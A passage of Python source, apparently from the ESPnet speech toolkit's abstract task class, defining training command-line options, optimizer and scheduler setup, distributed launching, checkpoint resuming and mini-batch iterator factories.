then "required_data_names" should be as
>>> required_data_names = ('input', 'output')
"""
raise NotImplementedError
@classmethod
@abstractmethod
def optional_data_names(cls, inference: bool = False) -> Tuple[str, ...]:
"""Define the optional names by Task
This function is used by
>>> cls.check_task_requirements()
If your model is defined as following,
>>> from espnet2.train.abs_espnet_model import AbsESPnetModel
>>> class Model(AbsESPnetModel):
... def forward(self, input, output, opt=None): pass
then "optional_data_names" should be as
>>> optional_data_names = ('opt',)
"""
raise NotImplementedError
@classmethod
@abstractmethod
def build_model(cls, args: argparse.Namespace) -> AbsESPnetModel:
raise NotImplementedError
@classmethod
def get_parser(cls) -> config_argparse.ArgumentParser:
assert check_argument_types()
class ArgumentDefaultsRawTextHelpFormatter(
argparse.RawTextHelpFormatter, argparse.ArgumentDefaultsHelpFormatter,
):
pass
parser = config_argparse.ArgumentParser(
description="base parser",
formatter_class=ArgumentDefaultsRawTextHelpFormatter,
)
# NOTE(kamo): Use '_' instead of '-' to avoid confusion.
# I think '-' looks really confusing if it's written in yaml.
# NOTE(kamo): add_arguments(..., required=True) can't be used
# to provide --print_config mode. Instead of it, do as
parser.set_defaults(required=["output_dir"])
group = parser.add_argument_group("Common configuration")
group.add_argument(
"--print_config",
action="store_true",
help="Print the config file and exit",
)
group.add_argument(
"--log_level",
type=lambda x: x.upper(),
default="INFO",
choices=("ERROR", "WARNING", "INFO", "DEBUG", "NOTSET"),
help="The verbose level of logging",
)
group.add_argument(
"--dry_run",
type=str2bool,
default=False,
help="Perform process without training",
)
group.add_argument(
"--iterator_type",
type=str,
choices=["sequence", "chunk", "none"],
default="sequence",
help="Specify iterator type",
)
group.add_argument("--output_dir", type=str_or_none, default=None)
group.add_argument(
"--ngpu",
type=int,
default=0,
help="The number of gpus. 0 indicates CPU mode",
)
group.add_argument("--seed", type=int, default=0, help="Random seed")
group.add_argument(
"--num_workers",
type=int,
default=1,
help="The number of workers used for DataLoader",
)
group.add_argument(
"--num_att_plot",
type=int,
default=3,
help="The number images to plot the outputs from attention. "
"This option makes sense only when attention-based model",
)
group = parser.add_argument_group("distributed training related")
group.add_argument(
"--dist_backend", default="nccl", type=str, help="distributed backend",
)
group.add_argument(
"--dist_init_method",
type=str,
default="env://",
help='if init_method="env://", env values of "MASTER_PORT", "MASTER_ADDR", '
'"WORLD_SIZE", and "RANK" are referred.',
)
group.add_argument(
"--dist_world_size",
default=None,
type=int_or_none,
help="number of nodes for distributed training",
)
group.add_argument(
"--dist_rank",
type=int_or_none,
default=None,
help="node rank for distributed training",
)
group.add_argument(
# Not starting with "dist_" for compatibility to launch.py
"--local_rank",
type=int_or_none,
default=None,
help="local rank for distributed training. This option is used if "
"--multiprocessing_distributed=false",
)
group.add_argument(
"--dist_master_addr",
default=None,
type=str_or_none,
help="The master address for distributed training. "
"This value is used when dist_init_method == 'env://'",
)
group.add_argument(
"--dist_master_port",
default=None,
type=int_or_none,
help="The master port for distributed training"
"This value is used when dist_init_method == 'env://'",
)
group.add_argument(
"--dist_launcher",
default=None,
type=str_or_none,
choices=["slurm", "mpi", None],
help="The launcher type for distributed training",
)
group.add_argument(
"--multiprocessing_distributed",
default=False,
type=str2bool,
help="Use multi-processing distributed training to launch "
"N processes per node, which has N GPUs. This is the "
"fastest way to use PyTorch for either single node or "
"multi node data parallel training",
)
group = parser.add_argument_group("cudnn mode related")
group.add_argument(
"--cudnn_enabled",
type=str2bool,
default=torch.backends.cudnn.enabled,
help="Enable CUDNN",
)
group.add_argument(
"--cudnn_benchmark",
type=str2bool,
default=torch.backends.cudnn.benchmark,
help="Enable cudnn-benchmark mode",
)
group.add_argument(
"--cudnn_deterministic",
type=str2bool,
default=True,
help="Enable cudnn-deterministic mode",
)
group = parser.add_argument_group("collect stats mode related")
group.add_argument(
"--collect_stats",
type=str2bool,
default=False,
help='Perform on "collect stats" mode',
)
group.add_argument(
"--write_collected_feats",
type=str2bool,
default=False,
help='Write the output features from the model when "collect stats" mode',
)
group = parser.add_argument_group("Trainer related")
group.add_argument(
"--max_epoch",
type=int,
default=40,
help="The maximum number epoch to train",
)
group.add_argument(
"--patience",
type=int_or_none,
default=None,
help="Number of epochs to wait without improvement "
"before stopping the training",
)
group.add_argument(
"--val_scheduler_criterion",
type=str,
nargs=2,
default=("valid", "loss"),
help="The criterion used for the value given to the lr scheduler. "
'Give a pair referring the phase, "train" or "valid",'
'and the criterion name. The mode specifying "min" or "max" can '
"be changed by --scheduler_conf",
)
group.add_argument(
"--early_stopping_criterion",
type=str,
nargs=3,
default=("valid", "loss", "min"),
help="The criterion used for judging of early stopping. "
'Give a pair referring the phase, "train" or "valid",'
'the criterion name and the mode, "min" or "max", e.g. "acc,max".',
)
group.add_argument(
"--best_model_criterion",
type=str2triple_str,
nargs="+",
default=[
("train", "loss", "min"),
("valid", "loss", "min"),
("train", "acc", "max"),
("valid", "acc", "max"),
],
help="The criterion used for judging of the best model. "
'Give a pair referring the phase, "train" or "valid",'
'the criterion name, and the mode, "min" or "max", e.g. "acc,max".',
)
group.add_argument(
"--keep_nbest_models",
type=int,
default=10,
help="Remove previous snapshots excluding the n-best scored epochs",
)
group.add_argument(
"--grad_clip",
type=float,
default=5.0,
help="Gradient norm threshold to clip",
)
group.add_argument(
"--grad_noise",
type=str2bool,
default=False,
help="The flag to switch to use noise injection to "
"gradients during training",
)
group.add_argument(
"--accum_grad",
type=int,
default=1,
help="The number of gradient accumulation",
)
group.add_argument(
"--no_forward_run",
type=str2bool,
default=False,
help="Just only iterating data loading without "
"model forwarding and training",
)
group.add_argument(
"--resume",
type=str2bool,
default=False,
help="Enable resuming if checkpoint is existing",
)
group.add_argument(
"--train_dtype",
default="float32",
choices=["float16", "float32", "float64"],
help="Data type for training.",
)
group.add_argument(
"--use_amp",
type=str2bool,
default=False,
help="Enable Automatic Mixed Precision. This feature requires pytorch>=1.6",
)
group.add_argument(
"--log_interval",
type=int_or_none,
default=None,
help="Show the logs every the number iterations in each epochs at the "
"training phase. If None is given, it is decided according the number "
"of training samples automatically .",
)
group = parser.add_argument_group("Pretraining model related")
group.add_argument("--pretrain_path", type=str, default=[], nargs="*")
group.add_argument("--pretrain_key", type=str_or_none, default=[], nargs="*")
group = parser.add_argument_group("BatchSampler related")
group.add_argument(
"--num_iters_per_epoch",
type=int_or_none,
default=None,
help="Restrict the number of iterations for training per epoch",
)
group.add_argument(
"--batch_size",
type=int,
default=20,
help="The mini-batch size used for training. Used if batch_type='unsorted',"
" 'sorted', or 'folded'.",
)
group.add_argument(
"--valid_batch_size",
type=int_or_none,
default=None,
help="If not given, the value of --batch_size is used",
)
group.add_argument(
"--batch_bins",
type=int,
default=1000000,
help="The number of batch bins. Used if batch_type='length' or 'numel'",
)
group.add_argument(
"--valid_batch_bins",
type=int_or_none,
default=None,
help="If not given, the value of --batch_bins is used",
)
group.add_argument("--train_shape_file", type=str, action="append", default=[])
group.add_argument("--valid_shape_file", type=str, action="append", default=[])
group = parser.add_argument_group("Sequence iterator related")
_batch_type_help = ""
for key, value in BATCH_TYPES.items():
_batch_type_help += f'"{key}":\n{value}\n'
group.add_argument(
"--batch_type",
type=str,
default="folded",
choices=list(BATCH_TYPES),
help=_batch_type_help,
)
group.add_argument(
"--valid_batch_type",
type=str_or_none,
default=None,
choices=list(BATCH_TYPES) + [None],
help="If not given, the value of --batch_type is used",
)
group.add_argument("--fold_length", type=int, action="append", default=[])
group.add_argument(
"--sort_in_batch",
type=str,
default="descending",
choices=["descending", "ascending"],
help="Sort the samples in each mini-batches by the sample "
'lengths. To enable this, "shape_file" must have the length information.',
)
group.add_argument(
"--sort_batch",
type=str,
default="descending",
choices=["descending", "ascending"],
help="Sort mini-batches by the sample lengths",
)
group.add_argument(
"--multiple_iterator",
type=str2bool,
default=False,
help="Use multiple iterator mode",
)
group = parser.add_argument_group("Chunk iterator related")
group.add_argument(
"--chunk_length",
type=str_or_int,
default=500,
help="Specify chunk length. e.g. '300', '300,400,500', or '300-400'."
"If multiple numbers separated by command are given, "
"one of them is selected randomly for each samples. "
"If two numbers are given with '-', it indicates the range of the choices. "
"Note that if the sequence length is shorter than the all chunk_lengths, "
"the sample is discarded. ",
)
group.add_argument(
"--chunk_shift_ratio",
type=float,
default=0.5,
help="Specify the shift width of chunks. If it's less than 1, "
"allows the overlapping and if bigger than 1, there are some gaps "
"between each chunk.",
)
group.add_argument(
"--num_cache_chunks",
type=int,
default=1024,
help="Shuffle in the specified number of chunks and generate mini-batches "
"More larger this value, more randomness can be obtained.",
)
group = parser.add_argument_group("Dataset related")
_data_path_and_name_and_type_help = (
"Give three words splitted by comma. It's used for the training data. "
"e.g. '--train_data_path_and_name_and_type some/path/a.scp,foo,sound'. "
"The first value, some/path/a.scp, indicates the file path, "
"and the second, foo, is the key name used for the mini-batch data, "
"and the last, sound, decides the file type. "
"This option is repeatable, so you can input any number of features "
"for your task. Supported file types are as follows:\n\n"
)
for key, dic in DATA_TYPES.items():
_data_path_and_name_and_type_help += f'"{key}":\n{dic["help"]}\n\n'
group.add_argument(
"--train_data_path_and_name_and_type",
type=str2triple_str,
action="append",
default=[],
help=_data_path_and_name_and_type_help,
)
group.add_argument(
"--valid_data_path_and_name_and_type",
type=str2triple_str,
action="append",
default=[],
)
group.add_argument(
"--allow_variable_data_keys",
type=str2bool,
default=False,
help="Allow the arbitrary keys for mini-batch with ignoring "
"the task requirements",
)
group.add_argument(
"--max_cache_size",
type=humanfriendly.parse_size,
default=0.0,
help="The maximum cache size for data loader. e.g. 10MB, 20GB.",
)
group.add_argument(
"--valid_max_cache_size",
type=humanfriendly_parse_size_or_none,
default=None,
help="The maximum cache size for validation data loader. e.g. 10MB, 20GB. "
"If None, the 5 percent size of --max_cache_size",
)
group = parser.add_argument_group("Optimizer related")
for i in range(1, cls.num_optimizers + 1):
suf = "" if i == 1 else str(i)
group.add_argument(
f"--optim{suf}",
type=lambda x: x.lower(),
default="adadelta",
choices=list(optim_classes),
help="The optimizer type",
)
group.add_argument(
f"--optim{suf}_conf",
action=NestedDictAction,
default=dict(),
help="The keyword arguments for optimizer",
)
group.add_argument(
f"--scheduler{suf}",
type=lambda x: str_or_none(x.lower()),
default=None,
choices=list(scheduler_classes) + [None],
help="The lr scheduler type",
)
group.add_argument(
f"--scheduler{suf}_conf",
action=NestedDictAction,
default=dict(),
help="The keyword arguments for lr scheduler",
)
cls.trainer.add_arguments(parser)
cls.add_task_arguments(parser)
assert check_return_type(parser)
return parser
@classmethod
def build_optimizers(
cls, args: argparse.Namespace, model: torch.nn.Module,
) -> List[torch.optim.Optimizer]:
if cls.num_optimizers != 1:
raise RuntimeError(
"build_optimizers() must be overridden if num_optimizers != 1"
)
optim_class = optim_classes.get(args.optim)
if optim_class is None:
raise ValueError(f"must be one of {list(optim_classes)}: {args.optim}")
optim = optim_class(model.parameters(), **args.optim_conf)
optimizers = [optim]
return optimizers
@classmethod
def exclude_opts(cls) -> Tuple[str, ...]:
"""The options not to be shown by --print_config"""
return "required", "print_config", "config", "ngpu"
@classmethod
def get_default_config(cls) -> Dict[str, Any]:
"""Return the configuration as dict.
This method is used by print_config()
"""
def get_class_type(name: str, classes: dict):
_cls = classes.get(name)
if _cls is None:
raise ValueError(f"must be one of {list(classes)}: {name}")
return _cls
# This method is used only for --print_config
assert check_argument_types()
parser = cls.get_parser()
args, _ = parser.parse_known_args()
config = vars(args)
# Excludes the options not to be shown
for k in AbsTask.exclude_opts():
config.pop(k)
for i in range(1, cls.num_optimizers + 1):
suf = "" if i == 1 else str(i)
name = config[f"optim{suf}"]
optim_class = get_class_type(name, optim_classes)
conf = get_default_kwargs(optim_class)
# Overwrite the default by the arguments,
conf.update(config[f"optim{suf}_conf"])
# and set it again
config[f"optim{suf}_conf"] = conf
name = config[f"scheduler{suf}"]
if name is not None:
scheduler_class = get_class_type(name, scheduler_classes)
conf = get_default_kwargs(scheduler_class)
# Overwrite the default by the arguments,
conf.update(config[f"scheduler{suf}_conf"])
# and set it again
config[f"scheduler{suf}_conf"] = conf
for class_choices in cls.class_choices_list:
if getattr(args, class_choices.name) is not None:
class_obj = class_choices.get_class(getattr(args, class_choices.name))
conf = get_default_kwargs(class_obj)
name = class_choices.name
# Overwrite the default by the arguments,
conf.update(config[f"{name}_conf"])
# and set it again
config[f"{name}_conf"] = conf
return config
@classmethod
def check_required_command_args(cls, args: argparse.Namespace):
assert check_argument_types()
for k in vars(args):
if "-" in k:
raise RuntimeError(f'Use "_" instead of "-": parser.get_parser("{k}")')
if len(args.pretrain_path) != len(args.pretrain_key):
raise RuntimeError(
"The number of --pretrain_path and --pretrain_key must be same"
)
required = ", ".join(
f"--{a}" for a in args.required if getattr(args, a) is None
)
if len(required) != 0:
parser = cls.get_parser()
parser.print_help(file=sys.stderr)
p = Path(sys.argv[0]).name
print(file=sys.stderr)
print(
f"{p}: error: the following arguments are required: " f"{required}",
file=sys.stderr,
)
sys.exit(2)
@classmethod
def check_task_requirements(
cls,
dataset: Union[ESPnetDataset, IterableESPnetDataset],
allow_variable_data_keys: bool,
inference: bool = False,
) -> None:
"""Check if the dataset satisfy the requirement of current Task"""
assert check_argument_types()
mes = (
f"If you intend to use an additional input, modify "
f'"{cls.__name__}.required_data_names()" or '
f'"{cls.__name__}.optional_data_names()". '
f"Otherwise you need to set --allow_variable_data_keys true "
)
for k in cls.required_data_names(inference):
if not dataset.has_name(k):
raise RuntimeError(
f'"{cls.required_data_names(inference)}" are required for'
f' {cls.__name__}. but "{dataset.names()}" are input.\n{mes}'
)
if not allow_variable_data_keys:
task_keys = cls.required_data_names(inference) + cls.optional_data_names(
inference
)
for k in dataset.names():
if k not in task_keys:
raise RuntimeError(
f"The data-name must be one of {task_keys} "
f'for {cls.__name__}: "{k}" is not allowed.\n{mes}'
)
@staticmethod
def resume(
checkpoint: Union[str, Path],
model: torch.nn.Module,
reporter: Reporter,
optimizers: Sequence[torch.optim.Optimizer],
schedulers: Sequence[Optional[AbsScheduler]],
scaler: Optional[GradScaler],
ngpu: int = 0,
):
states = torch.load(
checkpoint,
map_location=f"cuda:{torch.cuda.current_device()}" if ngpu > 0 else "cpu",
)
model.load_state_dict(states["model"])
reporter.load_state_dict(states["reporter"])
for optimizer, state in zip(optimizers, states["optimizers"]):
optimizer.load_state_dict(state)
for scheduler, state in zip(schedulers, states["schedulers"]):
if scheduler is not None:
scheduler.load_state_dict(state)
if scaler is not None:
if states["scaler"] is None:
logging.warning("scaler state is not found")
else:
scaler.load_state_dict(states["scaler"])
logging.info(f"The training was resumed using {checkpoint}")
@classmethod
def print_config(cls, file=sys.stdout) -> None:
assert check_argument_types()
# Shows the config: e.g. python train.py asr --print_config
config = cls.get_default_config()
file.write(yaml_no_alias_safe_dump(config, indent=4, sort_keys=False))
@classmethod
def main(cls, args: argparse.Namespace = None, cmd: Sequence[str] = None):
if cls.num_optimizers != cls.trainer.num_optimizers:
raise RuntimeError(
f"Task.num_optimizers != Task.trainer.num_optimizers: "
f"{cls.num_optimizers} != {cls.trainer.num_optimizers}"
)
assert check_argument_types()
print(get_commandline_args(), file=sys.stderr)
if args is None:
parser = cls.get_parser()
args = parser.parse_args(cmd)
if args.print_config:
cls.print_config()
sys.exit(0)
cls.check_required_command_args(args)
# "distributed" is decided using the other command args
resolve_distributed_mode(args)
if not args.distributed or not args.multiprocessing_distributed:
cls.main_worker(args)
else:
assert args.ngpu > 1, args.ngpu
# Multi-processing distributed mode: e.g. 2node-4process-4GPU
# | Host1 | Host2 |
# | Process1 | Process2 | <= Spawn processes
# |Child1|Child2|Child1|Child2|
# |GPU1 |GPU2 |GPU1 |GPU2 |
# See also the following usage of --multiprocessing-distributed:
# https://github.com/pytorch/examples/blob/master/imagenet/main.py
num_nodes = get_num_nodes(args.dist_world_size, args.dist_launcher)
if num_nodes == 1:
args.dist_master_addr = "localhost"
args.dist_rank = 0
# Single node distributed training with multi-GPUs
if (
args.dist_init_method == "env://"
and get_master_port(args.dist_master_port) is None
):
# Get the unused port
args.dist_master_port = free_port()
# Assume that nodes use same number of GPUs each other
args.dist_world_size = args.ngpu * num_nodes
node_rank = get_node_rank(args.dist_rank, args.dist_launcher)
# The following block is copied from:
# https://github.com/pytorch/pytorch/blob/master/torch/multiprocessing/spawn.py
error_queues = []
processes = []
mp = torch.multiprocessing.get_context("spawn")
for i in range(args.ngpu):
# Copy args
local_args = argparse.Namespace(**vars(args))
local_args.local_rank = i
local_args.dist_rank = args.ngpu * node_rank + i
local_args.ngpu = 1
process = mp.Process(
target=cls.main_worker, args=(local_args,), daemon=False,
)
process.start()
processes.append(process)
error_queues.append(mp.SimpleQueue())
# Loop on join until it returns True or raises an exception.
while not ProcessContext(processes, error_queues).join():
pass
@classmethod
def main_worker(cls, args: argparse.Namespace):
assert check_argument_types()
# 0. Init distributed process
distributed_option = build_dataclass(DistributedOption, args)
distributed_option.init()
# NOTE(kamo): Don't use logging before invoking logging.basicConfig()
if not distributed_option.distributed or distributed_option.dist_rank == 0:
if not distributed_option.distributed:
_rank = ""
else:
_rank = (
f":{distributed_option.dist_rank}/"
f"{distributed_option.dist_world_size}"
)
# NOTE(kamo):
# logging.basicConfig() is invoked in main_worker() instead of main()
# because it can be invoked only once in a process.
# FIXME(kamo): Should we use logging.getLogger()?
logging.basicConfig(
level=args.log_level,
format=f"[{os.uname()[1].split('.')[0]}{_rank}]"
f" %(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
else:
# Suppress logging if RANK != 0
logging.basicConfig(
level="ERROR",
format=f"[{os.uname()[1].split('.')[0]}"
f":{distributed_option.dist_rank}/{distributed_option.dist_world_size}]"
f" %(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
# 1. Set random-seed
set_all_random_seed(args.seed)
torch.backends.cudnn.enabled = args.cudnn_enabled
torch.backends.cudnn.benchmark = args.cudnn_benchmark
torch.backends.cudnn.deterministic = args.cudnn_deterministic
# 2. Build model
model = cls.build_model(args=args)
if not isinstance(model, AbsESPnetModel):
raise RuntimeError(
f"model must inherit {AbsESPnetModel.__name__}, but got {type(model)}"
)
model = model.to(
dtype=getattr(torch, args.train_dtype),
device="cuda" if args.ngpu > 0 else "cpu",
)
# 3. Build optimizer
optimizers = cls.build_optimizers(args, model=model)
# 4. Build schedulers
schedulers = []
for i, optim in enumerate(optimizers, 1):
suf = "" if i == 1 else str(i)
name = getattr(args, f"scheduler{suf}")
conf = getattr(args, f"scheduler{suf}_conf")
if name is not None:
cls_ = scheduler_classes.get(name)
if cls_ is None:
raise ValueError(
f"must be one of {list(scheduler_classes)}: {name}"
)
scheduler = cls_(optim, **conf)
else:
scheduler = None
schedulers.append(scheduler)
logging.info(pytorch_cudnn_version())
logging.info(model_summary(model))
for i, (o, s) in enumerate(zip(optimizers, schedulers), 1):
suf = "" if i == 1 else str(i)
logging.info(f"Optimizer{suf}:\n{o}")
logging.info(f"Scheduler{suf}: {s}")
# 5. Dump "args" to config.yaml
# NOTE(kamo): "args" should be saved after object-buildings are done
# because they are allowed to modify "args".
output_dir = Path(args.output_dir)
if not distributed_option.distributed or distributed_option.dist_rank == 0:
output_dir.mkdir(parents=True, exist_ok=True)
with (output_dir / "config.yaml").open("w", encoding="utf-8") as f:
logging.info(
f'Saving the configuration in {output_dir / "config.yaml"}'
)
yaml_no_alias_safe_dump(vars(args), f, indent=4, sort_keys=False)
# 6. Loads pre-trained model
for p, k in zip(args.pretrain_path, args.pretrain_key):
load_pretrained_model(
model=model,
# Directly specify the model path e.g. exp/train/loss.best.pt
pretrain_path=p,
# if pretrain_key is None -> model
# elif pretrain_key is str e.g. "encoder" -> model.encoder
pretrain_key=k,
# NOTE(kamo): "cuda" for torch.load always indicates cuda:0
# in PyTorch<=1.4
map_location=f"cuda:{torch.cuda.current_device()}"
if args.ngpu > 0
else "cpu",
)
# 7. Resume the training state from the previous epoch
reporter = Reporter()
if args.use_amp:
if LooseVersion(torch.__version__) < LooseVersion("1.6.0"):
raise RuntimeError(
"Require torch>=1.6.0 for Automatic Mixed Precision"
)
scaler = GradScaler()
else:
scaler = None
if args.resume and (output_dir / "checkpoint.pth").exists():
cls.resume(
checkpoint=output_dir / "checkpoint.pth",
model=model,
optimizers=optimizers,
schedulers=schedulers,
reporter=reporter,
scaler=scaler,
ngpu=args.ngpu,
)
if args.dry_run:
pass
elif args.collect_stats:
# Perform on collect_stats mode. This mode has two roles
# - Derive the length and dimension of all input data
# - Accumulate feats, square values, and the length for whitening
if args.valid_batch_size is None:
args.valid_batch_size = args.batch_size
if len(args.train_shape_file) != 0:
train_key_file = args.train_shape_file[0]
else:
train_key_file = None
if len(args.valid_shape_file) != 0:
valid_key_file = args.valid_shape_file[0]
else:
valid_key_file = None
collect_stats(
model=model,
train_iter=cls.build_streaming_iterator(
data_path_and_name_and_type=args.train_data_path_and_name_and_type,
key_file=train_key_file,
batch_size=args.batch_size,
dtype=args.train_dtype,
num_workers=args.num_workers,
allow_variable_data_keys=args.allow_variable_data_keys,
ngpu=args.ngpu,
preprocess_fn=cls.build_preprocess_fn(args, train=False),
collate_fn=cls.build_collate_fn(args),
),
valid_iter=cls.build_streaming_iterator(
data_path_and_name_and_type=args.valid_data_path_and_name_and_type,
key_file=valid_key_file,
batch_size=args.valid_batch_size,
dtype=args.train_dtype,
num_workers=args.num_workers,
allow_variable_data_keys=args.allow_variable_data_keys,
ngpu=args.ngpu,
preprocess_fn=cls.build_preprocess_fn(args, train=False),
collate_fn=cls.build_collate_fn(args),
),
output_dir=output_dir,
ngpu=args.ngpu,
log_interval=args.log_interval,
write_collected_feats=args.write_collected_feats,
)
else:
# 8. Build iterator factories
common_iter_kwargs = dict(
iterator_type=args.iterator_type,
train_dtype=args.train_dtype,
num_workers=args.num_workers,
seed=args.seed,
allow_variable_data_keys=args.allow_variable_data_keys,
ngpu=args.ngpu,
fold_length=args.fold_length,
sort_in_batch=args.sort_in_batch,
sort_batch=args.sort_batch,
chunk_length=args.chunk_length,
chunk_shift_ratio=args.chunk_shift_ratio,
num_cache_chunks=args.num_cache_chunks,
)
train_iter_factory = cls.build_iter_factory(
data_path_and_name_and_type=args.train_data_path_and_name_and_type,
shape_files=args.train_shape_file,
batch_size=args.batch_size,
batch_bins=args.batch_bins,
batch_type=args.batch_type,
train=not args.collect_stats,
multiple_iterator=args.multiple_iterator,
preprocess_fn=cls.build_preprocess_fn(args, train=True),
collate_fn=cls.build_collate_fn(args),
num_iters_per_epoch=args.num_iters_per_epoch,
max_cache_size=args.max_cache_size,
distributed=distributed_option.distributed,
name="train",
**common_iter_kwargs,
)
if args.valid_batch_type is None:
args.valid_batch_type = args.batch_type
if args.valid_batch_size is None:
args.valid_batch_size = args.batch_size
if args.valid_batch_bins is None:
args.valid_batch_bins = args.batch_bins
if args.valid_max_cache_size is None:
# Cache 5% of maximum size for validation loader
args.valid_max_cache_size = 0.05 * args.max_cache_size
valid_iter_factory = cls.build_iter_factory(
data_path_and_name_and_type=args.valid_data_path_and_name_and_type,
shape_files=args.valid_shape_file,
batch_size=args.valid_batch_size,
batch_bins=args.valid_batch_bins,
batch_type=args.batch_type,
train=False,
multiple_iterator=False,
preprocess_fn=cls.build_preprocess_fn(args, train=False),
collate_fn=cls.build_collate_fn(args),
num_iters_per_epoch=None,
max_cache_size=args.valid_max_cache_size,
distributed=distributed_option.distributed,
name="valid",
**common_iter_kwargs,
)
if args.num_att_plot != 0:
plot_attention_iter_factory = cls.build_iter_factory(
data_path_and_name_and_type=args.valid_data_path_and_name_and_type,
shape_files=args.valid_shape_file,
batch_type="unsorted",
batch_size=1,
batch_bins=0,
train=False,
multiple_iterator=False,
preprocess_fn=cls.build_preprocess_fn(args, train=False),
collate_fn=cls.build_collate_fn(args),
num_batches=args.num_att_plot,
num_iters_per_epoch=None,
# num_att_plot should be a few sample ~ 3, so cache all data.
max_cache_size=np.inf if args.max_cache_size != 0.0 else 0.0,
# always False because plot_attention performs on RANK0
distributed=False,
name="plot_att",
**common_iter_kwargs,
)
else:
plot_attention_iter_factory = None
# 9. Start training
# Don't give args to trainer.run() directly!!!
# Instead of it, define "Options" object and build here.
trainer_options = cls.trainer.build_options(args)
cls.trainer.run(
model=model,
optimizers=optimizers,
schedulers=schedulers,
train_iter_factory=train_iter_factory,
valid_iter_factory=valid_iter_factory,
plot_attention_iter_factory=plot_attention_iter_factory,
reporter=reporter,
scaler=scaler,
output_dir=output_dir,
max_epoch=args.max_epoch,
seed=args.seed,
patience=args.patience,
keep_nbest_models=args.keep_nbest_models,
early_stopping_criterion=args.early_stopping_criterion,
best_model_criterion=args.best_model_criterion,
val_scheduler_criterion=args.val_scheduler_criterion,
trainer_options=trainer_options,
distributed_option=distributed_option,
)
if not distributed_option.distributed or distributed_option.dist_rank == 0:
# Generated n-best averaged model
average_nbest_models(
reporter=reporter,
output_dir=output_dir,
best_model_criterion=args.best_model_criterion,
nbest=args.keep_nbest_models,
)
@classmethod
def build_iter_factory(
cls,
iterator_type: str,
batch_size: int,
batch_bins: int,
preprocess_fn,
collate_fn,
train_dtype: str,
num_workers: int,
seed: int,
allow_variable_data_keys: bool,
ngpu: int,
data_path_and_name_and_type,
shape_files: Union[Tuple[str, ...], List[str]],
batch_type: str,
train: bool,
num_iters_per_epoch: Optional[int],
max_cache_size: float,
distributed: bool,
name: str,
fold_length: Sequence[int],
sort_in_batch: str,
sort_batch: str,
chunk_length: Union[int, str],
chunk_shift_ratio: float,
num_cache_chunks: int,
multiple_iterator: bool,
num_batches: int = None,
) -> AbsIterFactory:
"""Build a factory object of mini-batch iterator.
This object is invoked at every epochs to build the iterator for each epoch
as following:
>>> iter_factory = cls.build_iter_factory(...)
>>> for epoch in range(1, max_epoch):
... for keys, batch in iter_fatory.build_iter(epoch):
... model(**batch)
The mini-batches for each epochs are fully controlled by this class.
Note that the random seed used for shuffling is decided as "seed + epoch" and
the generated mini-batches can be reproduces when resuming.
Note that the definition of "epoch" doesn't always indicate
to run out of the whole training corpus.
"--num_iters_per_epoch" option restricts the number of iterations for each epoch
and the rest of samples for the originally epoch are left for the next epoch.
e.g. If The number of mini-batches equals to 4, the following two are same:
- 1 epoch without "--num_iters_per_epoch"
- 4 epoch with "--num_iters_per_epoch" == 4
"""
assert check_argument_types()
kwargs = dict(
data_path_and_name_and_type=data_path_and_name_and_type,
shape_files=shape_files,
train=train,
preprocess_fn=preprocess_fn,
collate_fn=collate_fn,
num_batches=num_batches,
num_iters_per_epoch=num_iters_per_epoch,
max_cache_size=max_cache_size,
distributed=distributed,
name=name,
batch_size=batch_size,
train_dtype=train_dtype,
num_workers=num_workers,
seed=seed,
allow_variable_data_keys=allow_variable_data_keys,
ngpu=ngpu,
)
if multiple_iterator:
return cls.build_multiple_iter_factroy(
**kwargs,
multiple_iterator=False,
iterator_type=iterator_type,
batch_type=batch_type,
batch_bins=batch_bins,
fold_length=fold_length,
sort_in_batch=sort_in_batch,
sort_batch=sort_batch,
chunk_length=chunk_length,
chunk_shift_ratio=chunk_shift_ratio,
num_cache_chunks=num_cache_chunks,
)
elif iterator_type == "sequence":
return cls.build_sequence_iter_factory(
**kwargs,
batch_type=batch_type,
batch_bins=batch_bins,
fold_length=fold_length,
sort_in_batch=sort_in_batch,
sort_batch=sort_batch,
)
elif iterator_type == "chunk":
return cls.build_chunk_iter_factory(
**kwargs,
chunk_length=chunk_length,
chunk_shift_ratio=chunk_shift_ratio,
num_cache_chunks=num_cache_chunks,
)
else:
raise RuntimeError(f"Not supported: iterator_type={iterator_type}")
@classmethod
def build_sequence_iter_factory(
cls,
data_path_and_name_and_type,
shape_files: Union[Tuple[str, ...], List[str]],
batch_type: str,
train: bool,
preprocess_fn,
batch_size: int,
batch_bins: int,
collate_fn,
train_dtype: str,
fold_length: Sequence[int],
num_workers: int,
sort_in_batch: str,
sort_batch: str,
seed: int,
allow_variable_data_keys: bool,
ngpu: int,
num_batches: Optional[int],
num_iters_per_epoch: Optional[int],
max_cache_size: float,
distributed: bool,
name: str,
) -> AbsIterFactory:
assert check_argument_types()
dataset = ESPnetDataset(
data_path_and_name_and_type,
float_dtype=train_dtype,
preprocess=preprocess_fn,
max_cache_size=max_cache_size,
)
cls.check_task_requirements(dataset, allow_variable_data_keys)
batch_sampler = build_batch_sampler(
type=batch_type,
shape_files=shape_files,
fold_lengths=fold_length,
batch_size=batch_size,
batch_bins=batch_bins,
sort_in_batch=sort_in_batch,
sort_batch=sort_batch,
drop_last=False,
min_batch_size=torch.distributed.get_world_size() if distributed else 1,
)
batches = list(batch_sampler)
if num_batches is not None:
batches = batches[:num_batches]
bs_list = [len(batch) for batch in batches]
logging.info(f"[{name}] dataset:\n{dataset}")
logging.info(f"[{name}] Batch sampler: {batch_sampler}")
logging.info(
f"[{name}] mini-batch sizes summary: N-batch={len(bs_list)}, "
f"mean={np.mean(bs_list):.1f}, min={np.min(bs_list)}, max={np.max(bs_list)}"
)
if distributed:
world_size = torch.distributed.get_world_size()
rank = torch.distributed.get_rank()
for batch in batches:
if len(batch) < world_size:
raise RuntimeError(
f"The batch-size must be equal or more than world_size: "
f"{len(batch)} < {world_size}"
)
batches = [batch[rank::world_size] for batch in batches]
return SequenceIterFactory(
dataset=dataset,
batches=batches,
seed=seed,
num_iters_per_epoch=num_iters_per_epoch,
shuffle=train,
num_workers=num_workers,
collate_fn=collate_fn,
pin_memory=ngpu > 0,
)
@classmethod
def build_chunk_iter_factory(
cls,
data_path_and_name_and_type,
shape_files: Union[Tuple[str, ...], List[str]],
train: bool,
preprocess_fn,
collate_fn,
train_dtype: str,
num_workers: int,
seed: int,
allow_variable_data_keys: bool,
batch_size: int,
ngpu: int,
chunk_length: Union[int, str],
chunk_shift_ratio: float,
num_cache_chunks: int,
num_batches: Optional[int],
